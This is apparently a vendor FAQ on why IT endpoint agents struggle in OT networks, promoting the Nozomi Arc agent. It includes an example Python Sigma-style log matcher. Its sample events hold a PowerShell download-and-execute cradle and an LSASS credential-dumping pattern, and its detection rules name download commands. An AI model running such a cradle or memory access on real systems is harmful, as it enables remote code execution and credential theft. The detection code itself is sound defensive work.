CYBERSECURITY FAQ

Why Don't IT Endpoint Security Agents Work in OT?

IT endpoint security agents don’t work in OT because they’re heavyweight and disruptive, can’t understand OT/IoT protocols and aren’t trained on OT environments, so they detect the wrong threats.

Endpoint security agents are a standard part of IT security deployments, not just on desktop computers, laptops and printers but on the explosion of IoT and remote devices. They’re essential for anti-virus protection and patching. Unfortunately, negative experiences deploying IT-focused agents on OT devices have led to scarce adoption of much-needed endpoint monitoring.

Here are some of the main reasons traditional endpoint agents fall short in industrial environments:

1. Heavyweight and Disruptive

Many OT devices and controllers run on constrained hardware sized for one specific task, often under a real-time or proprietary operating system that cannot host a general-purpose agent at all. Where an agent can be installed, even a standard anti-virus agent consumes CPU, memory and disk I/O the process may not be able to spare. IT endpoint security solutions also typically require a system reboot after installation, which in a plant means scheduled downtime or an unplanned process stop.

2. Wrong Threats

Traditional vulnerability scanners, intrusion prevention systems and endpoint agents are designed to detect IT threats using signatures, heuristics and machine learning models trained on IT environments. They don’t look for industrial threats, don’t understand industrial communication protocols and don’t recognize OT baselines, so normal control-system behavior looks to them like either noise or an anomaly. For example, while anti-virus solutions provide visibility into workstations, they can’t provide insight into industrial controllers and actuators. The consequences range from blind spots to active harm: an aggressive scan can render engineering hardware unresponsive; legitimate safety-system traffic or control-system commands can be flagged as malicious; and an agent can stop a process or quarantine a critical application it perceives as malware.

3. Kernel-level Access

On July 19, 2024, a defective content update to CrowdStrike’s Falcon endpoint sensor crashed Windows hosts worldwide. Because the sensor runs as a kernel-mode driver, a fault in its input took the whole operating system down rather than just the agent, and the resulting outages made OT stakeholders even more leery of deploying agents in industrial environments.

The incident underscores that an agent deployed in an OT environment, where high availability is the primary requirement, must itself be safe and non-disruptive: a fault in the agent must not be able to take the host down with it.

Released in 2023, Nozomi Arc does not operate at the kernel level of the host operating system, will never reboot your machines and is very light on system resources.

Safe, Effective Endpoint Security for OT Devices

Nozomi Arc is a safe, non-disruptive security agent purpose-built to protect the unique high availability requirements of OT endpoints. It sheds light on once unreachable, unmonitored areas of your environment where network sensors aren’t practical or simply can’t see: east-west traffic, USB ports, log files, local network traffic and user activity.

Benefits include:

  • Provides detailed data including device type, vendor, OS or firmware version, serial number, IP and MAC addresses, nodes, zones, protocols used, active accounts and suspicious user activity.
  • Detects threats such as infected third-party laptops, operator errors, malicious insiders and stolen credentials.
  • Analyzes event patterns in host log files using Sigma rules and spots in-progress events involving malware, credential theft, script downloading and more. This context is useful for both operators and security analysts.
  • Gives operators troubleshooting information they never had, which goes a long way toward building trust. With endpoint sensors, they can see not just configuration changes and anomalies but also who’s logged onto a device, what other devices it’s communicating with and what protocols it’s using.
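The Sigma bullet above describes matching event patterns in host logs. The following is an added example, not Nozomi Arc code and not any Nozomi or public Sigma rule: a minimal Python matcher for a subset of the Sigma rule format (named field maps, value lists, the contains/startswith/endswith modifiers, and conditions of the form "selection and not filter"), run over constructed Sysmon-style events from an engineering workstation and an HMI. The two rules, the hostnames ENG-WS01 and HMI-02, the user names and the address 203.0.113.7 are all invented for the example; a real deployment consumes the public Sigma YAML rules through a tool such as pySigma rather than a hand-rolled matcher like this one.

```python
"""Minimal Sigma-style rule matcher (added example, not Nozomi Arc code).

Supports only a subset of the Sigma format: named field maps, value lists
(OR), the |contains, |startswith and |endswith modifiers, and conditions of
the form "a", "a and b" or "a and not b". String matching is case-insensitive,
as Sigma specifies.
"""
from typing import Any

Event = dict[str, Any]

# Constructed sample events shaped like Sysmon records flattened to dicts.
# Hostnames, users and the 203.0.113.7 address are invented for this example.
SAMPLE_EVENTS: list[Event] = [
    # 1: PowerShell download cradle on an engineering workstation
    {"EventID": 1, "Computer": "ENG-WS01", "User": "PLANT\\tech",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://203.0.113.7/a.ps1')\""},
    # 2: unknown binary reading LSASS memory on an HMI (credential theft pattern)
    {"EventID": 10, "Computer": "HMI-02", "User": "PLANT\\tech",
     "SourceImage": "C:\\Users\\tech\\AppData\\Local\\Temp\\dump.exe",
     "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1010"},
    # 3: svchost.exe touching LSASS, which is normal Windows behaviour
    {"EventID": 10, "Computer": "HMI-02", "User": "NT AUTHORITY\\SYSTEM",
     "SourceImage": "C:\\Windows\\System32\\svchost.exe",
     "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1000"},
    # 4: legitimate engineering tool whose command line happens to say "download"
    {"EventID": 1, "Computer": "ENG-WS01", "User": "PLANT\\tech",
     "Image": "C:\\Program Files\\Vendor\\Engineering\\Studio.exe",
     "CommandLine": "Studio.exe /download line3.prj"},
]

# Illustrative rules written as Python dicts in the shape of Sigma YAML.
RULES: list[dict[str, Any]] = [
    {"title": "PowerShell download cradle",
     "detection": {
         "selection": {
             "EventID": 1,
             "Image|endswith": "\\powershell.exe",
             "CommandLine|contains": ["DownloadString", "DownloadFile", "Invoke-WebRequest"],
         },
         "condition": "selection"}},
    {"title": "LSASS memory access from non-System32 image",
     "detection": {
         "selection": {"EventID": 10, "TargetImage|endswith": "\\lsass.exe"},
         "filter": {"SourceImage|startswith": "C:\\Windows\\System32\\"},
         "condition": "selection and not filter"}},
]


def _match_value(actual: Any, pattern: Any, modifier: str) -> bool:
    """Compare one field value against one pattern under a Sigma modifier."""
    if actual is None:
        return False
    a, p = str(actual).lower(), str(pattern).lower()
    if modifier == "contains":
        return p in a
    if modifier == "startswith":
        return a.startswith(p)
    if modifier == "endswith":
        return a.endswith(p)
    return a == p


def _match_map(event: Event, field_map: dict[str, Any]) -> bool:
    """A field map is an AND over its fields; a list of values for one field is an OR."""
    for key, expected in field_map.items():
        field, _, modifier = key.partition("|")
        values = expected if isinstance(expected, list) else [expected]
        if not any(_match_value(event.get(field), v, modifier) for v in values):
            return False
    return True


def rule_matches(rule: dict[str, Any], event: Event) -> bool:
    """Evaluate a rule's condition ("a", "a and b", "a and not b") for one event."""
    detection = rule["detection"]
    results = {name: _match_map(event, fmap)
               for name, fmap in detection.items() if name != "condition"}
    for term in detection["condition"].split(" and "):
        negated = term.startswith("not ")
        name = term[4:] if negated else term
        if results[name] == negated:   # a negated term that hit, or a plain term that missed
            return False
    return True


def scan(events: list[Event], rules: list[dict[str, Any]]) -> list[tuple[str, str, str]]:
    """Return (rule title, host, user) for every rule/event pair that matches."""
    return [(rule["title"], ev["Computer"], ev["User"])
            for ev in events for rule in rules if rule_matches(rule, ev)]


if __name__ == "__main__":
    for title, host, user in scan(SAMPLE_EVENTS, RULES):
        print(f"{host}: {title} (user {user})")
```

Running it reports two hits: the download cradle on ENG-WS01 and the Temp-folder binary reading LSASS on HMI-02. The svchost.exe event is suppressed by the filter clause and the engineering tool's "/download" argument never reaches the string match because the Image check fails first. That filter is exactly the kind of tuning an OT deployment needs: the "wrong threats" problem described earlier is largely a matter of rules that were never given filters for the plant's own engineering-tool paths and service accounts.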

Top Use Cases for OT Endpoint Sensors

1. Strategic Deployment on Crown Jewels

Suppose network monitoring is overkill for your environment, but you still have critical assets to protect. Endpoint sensors enable you to deploy agents only on those assets, to monitor what matters most. They can be installed on hundreds of key endpoints with a few clicks and no reboot.

2. Speedier, No-Hassle Deployment

Suppose you have a remote substation where switches can only be reconfigured during a one-hour annual outage — next February. Or maybe you’re dealing with a 12-year-old line switch with no free ports. Again, just install endpoint sensors with no reboot.

3. Low Bandwidth, High-Latency Network

Cargo ships are prime candidates for endpoint sensors. They depend on satellite links for connectivity, and it’s almost impossible to deploy cabling for network sensors on board.

4. One-Time or Short-Term Monitoring

Say you just want to monitor that contract technician while he’s plugged in. You can install an endpoint sensor to monitor the machine he’s connected to and configure it to delete itself when he logs out.

5. Monitoring Offline Devices

Nozomi Arc collects data locally even when the host device is not sending or receiving traffic and sends it upstream when the user connects to the network. This is a great way to get detailed audit trails from field devices and mobile workers.